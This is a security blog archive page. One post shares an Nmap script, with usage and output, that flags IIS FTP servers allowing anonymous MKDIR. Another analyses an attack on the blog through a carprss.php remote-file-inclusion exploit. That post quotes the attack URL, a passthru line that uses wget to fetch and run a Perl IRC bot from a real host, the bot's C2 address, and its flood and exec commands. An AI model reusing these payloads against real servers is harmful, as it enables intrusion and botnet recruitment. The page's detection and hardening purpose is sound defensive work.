Tag Archives: Exploit

Updated: IIS-FTP Nmap Script


Yesterday, I posted an article about an Nmap script to detect potentially vulnerable Microsoft IIS FTP servers.

I updated the script, which now allows an alternative FTP user/password pair to be passed on the command line (thanks to Chris for the comment). If no arguments are provided, an anonymous FTP session is started.

Example:

# nmap -p 21 -sV --script=IIS-FTP --script-args=ftpuser=foo,ftppass=bar 10.0.0.7

The script location remains the same.

Detecting Vulnerable IIS-FTP Hosts Using Nmap

A new 0-day exploit for the FTP server included within the Microsoft IIS suite has been released today. Check the post on the Full Disclosure mailing list for more details.

Based on an existing Nmap script, I quickly wrote a new one that performs the following checks:

  • Check if anonymous sessions are allowed.
  • Check if the detected FTP server is running Microsoft ftpd.
  • Check if the MKDIR command is allowed (this seems to be required by the exploit).

If all those conditions are met, the script exits with a warning message. Note that my script only reports servers that could be vulnerable. On the other hand, running a server on which anonymous users are able to create directories is a major security weakness and must be fixed regardless of the newly discovered vulnerability!
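As an added example (not the author's NSE script), the same three checks implemented in Python with ftplib. assess() takes any object exposing ftplib.FTP's getwelcome/login/mkd/rmd/quit, so the decision logic can be exercised against a scripted session as well as a live host; it assumes an IIS greeting contains the word "Microsoft" and removes its probe directory again after a successful MKD.

```python
"""Re-implementation of the post's three checks (added example, not the
author's NSE script).  Assumption: an IIS FTP greeting contains "Microsoft"."""
import ftplib
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    microsoft_ftpd: bool   # banner identifies the service as Microsoft's FTP server
    login_accepted: bool   # the supplied (default: anonymous) credentials were accepted
    mkd_allowed: bool      # that user may create directories

    @property
    def potentially_vulnerable(self) -> bool:
        # Same rule as the NSE script: warn only when all three conditions hold.
        return self.microsoft_ftpd and self.login_accepted and self.mkd_allowed


def assess(ftp, user="anonymous", password="anonymous@") -> Finding:
    """Run the checks over an already-connected session.  `ftp` is anything exposing
    ftplib.FTP's getwelcome/login/mkd/rmd/quit, so a scripted fake works too."""
    banner = ftp.getwelcome() or ""
    microsoft = "microsoft" in banner.lower()

    try:
        ftp.login(user, password)
        logged_in = True
    except ftplib.all_errors:          # 530 and friends
        logged_in = False

    mkd_ok = False
    if logged_in:
        # Random name so the probe never collides with real content; removed again below.
        probe = "nse_probe_" + secrets.token_hex(4)
        try:
            ftp.mkd(probe)
            mkd_ok = True
            ftp.rmd(probe)
        except ftplib.all_errors:      # 550 Access denied, or RMD refused
            pass

    try:
        ftp.quit()
    except ftplib.all_errors:
        pass
    return Finding(microsoft, logged_in, mkd_ok)


def scan(host, port=21, user="anonymous", password="anonymous@", timeout=5.0) -> Finding:
    """Connect with ftplib and assess a live host (one port, like --script=IIS-FTP -p 21)."""
    ftp = ftplib.FTP()
    ftp.connect(host, port, timeout=timeout)
    return assess(ftp, user, password)
```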

To use the Nmap script, copy it into your local script repository (something like /usr/local/share/nmap/scripts/) and rebuild your script index:

# nmap --script-updatedb

Then the script will be executed against all detected FTP servers (using the “-sC” argument), or you can specify only this script to be executed (for speed):

# nmap -p 21 -sV --script=IIS-FTP 10.0.0.7

Starting Nmap 4.76 ( http://nmap.org ) at 2009-09-01 01:15 CEST
Interesting ports on test-win (10.0.0.7):
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
|_ IIS FTP: IIS Server allow anonymous and mkdir (potentially vulnerable)
Service Info: OS: Windows

The script is available here. Note that it is provided “as is”; it’s just a quick hack which worked for me.

Maybe you were not aware of Nmap's scripting capabilities. Feel free to read this small introduction to Nmap scripting.

carprss.php Exploit

0wn3d! Since 29 February, this blog has been hit by 400+ attempts to compromise the server and install an IRC bot. There is a new exploit for SiteBuilder in the wild. Hits came from the following compromised hosts:

# awk '{ print $1 }' <carprss.tmp  | sort -nu

Bad hits look like:

GET /tag//files/carprss.php?CarpPath=http://216.191.16.12/ \
      .shell/site/iyes.txt??

I downloaded the file iyes.txt; it’s a PHP script which contains a lot of lines such as:

@passthru('cd /tmp;wget http://216.191.16.12/.shell/site/ \
      hai.txt;perl hai.txt;rm -f hai.txt*');

This IP address belongs to AllStream, a Canadian Internet provider.
After a successful download via the URL above, the code is parsed and executed by carprss.php. I downloaded hai.txt. It’s a Perl script which performs several tasks:
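As an added example (not part of the original post), a small Python detector for this request pattern: it parses common/combined access-log lines, flags any query parameter whose value is itself a URL (the CarpPath remote-file-inclusion signature above, URL-encoded or not), and reports the unique source addresses the way the awk one-liner does. The log lines are constructed, using documentation-range addresses.

```python
"""Flag remote-file-inclusion attempts in web server access logs (added example)."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Common/combined log format: client address first, request line in quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a URL is the RFI signature; legitimate
# redirect parameters can trip this too, so treat hits as leads, not verdicts.
URL_SCHEME = re.compile(r"^(https?|ftp)://", re.I)

# Constructed sample lines (192.0.2.x / 198.51.100.x / 203.0.113.x are documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2008:02:14:07 +0100] "GET /tag//files/carprss.php?CarpPath=http://203.0.113.5/.shell/site/iyes.txt?? HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.3 - - [01/Mar/2008:02:15:11 +0100] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [01/Mar/2008:02:16:30 +0100] "GET /files/carprss.php?CarpPath=http%3A%2F%2F203.0.113.5%2F.shell%2Fsite%2Fiyes.txt%3F%3F HTTP/1.0" 200 512 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [01/Mar/2008:02:17:02 +0100] "GET /tag//files/carprss.php?CarpPath=ftp://203.0.113.9/pub/hai.txt HTTP/1.0" 404 310 "-" "Mozilla/4.0"',
    '198.51.100.8 - - [01/Mar/2008:02:18:45 +0100] "POST /comments.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


def rfi_attempts(lines):
    """Yield (ip, script_path, parameter, remote_url) for every request whose query
    carries a URL as a parameter value."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            decoded = unquote(value)          # parse_qsl decodes once; catch double-encoding too
            if URL_SCHEME.match(decoded):
                yield m["ip"], parts.path, key, decoded


def summarize(lines):
    """Unique sources (like `awk '{print $1}' | sort -u`), unique payload URLs, hit count."""
    hits = list(rfi_attempts(lines))
    return {
        "sources": sorted({ip for ip, *_ in hits}),
        "payloads": sorted({url for *_, url in hits}),
        "count": len(hits),
    }


if __name__ == "__main__":
    for ip, path, key, url in rfi_attempts(SAMPLE_LOG):
        print(f"{ip} -> {path} [{key}] includes {url}")
```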

#!/usr/bin/perl
#
########################################################
# Ketika Rasa Tak Dapat Di Ungkap Dengan Kata
#       Anak
#       _____
#      ( ___ )  _____  __  ___  ____  _   _
#      | |  \ \(  _  )(  \/   )( _  )( ) ( )
# _\\\\|_|_ _|_)_(_)_||_\__/|_||_|)_||_|_|_|_\ AnakDompu
#  ////| |   | ) | | || |\/ | || ___)| | | | /  crew
#      | |__/ /| (_) || |   | || |   | |_| |
#      (_____) (_____)(_)   (_)(_)   (_____)
#
#              AnakDompu [on] Dalnet © 2008
#
#
########################################################

It sets up an IRC bot which tries to connect to 61.246.177.225:65500 and joins channel #d0s:

# telnet 61.246.177.225 65500
Trying 61.246.177.225...
Connected to 61.246.177.225.
Escape character is '^]'.
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Looking up your hostname...
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Found your hostname

This IP address belongs to AirTel, an Internet provider in New Delhi.

The bot understands the following commands: “user”, “restart”, “mail”, “safe”, “inbox”, “conback”, “dns”, “info”, “vunl”, “bot”, “uname”, “rndnick”, “raw”, “eval”, “sexec”, “exec”, “passthru”, “popen”, “system”, “pscan”, “ud.server”, “download”, “die”, “logout”, “udpflood”, “tcpflood”.

How can this kind of attack be avoided? First, run patched software! But what else can be done to prevent them?

  • Do not run public servers with administrative rights (root).
  • Run the servers in a chroot’d environment.
  • Do not allow outgoing connections to unusual ports (65500 in this case).
  • Use ACL systems to prevent the servers from executing or accessing unusual files or directories. [1]
  • Run SELinux on Linux or systrace on *BSD.

I do not publish the scripts here, but I kept a copy of them. Ask me if you need to have a look at them “for study only”. If you have more information, let’s share it!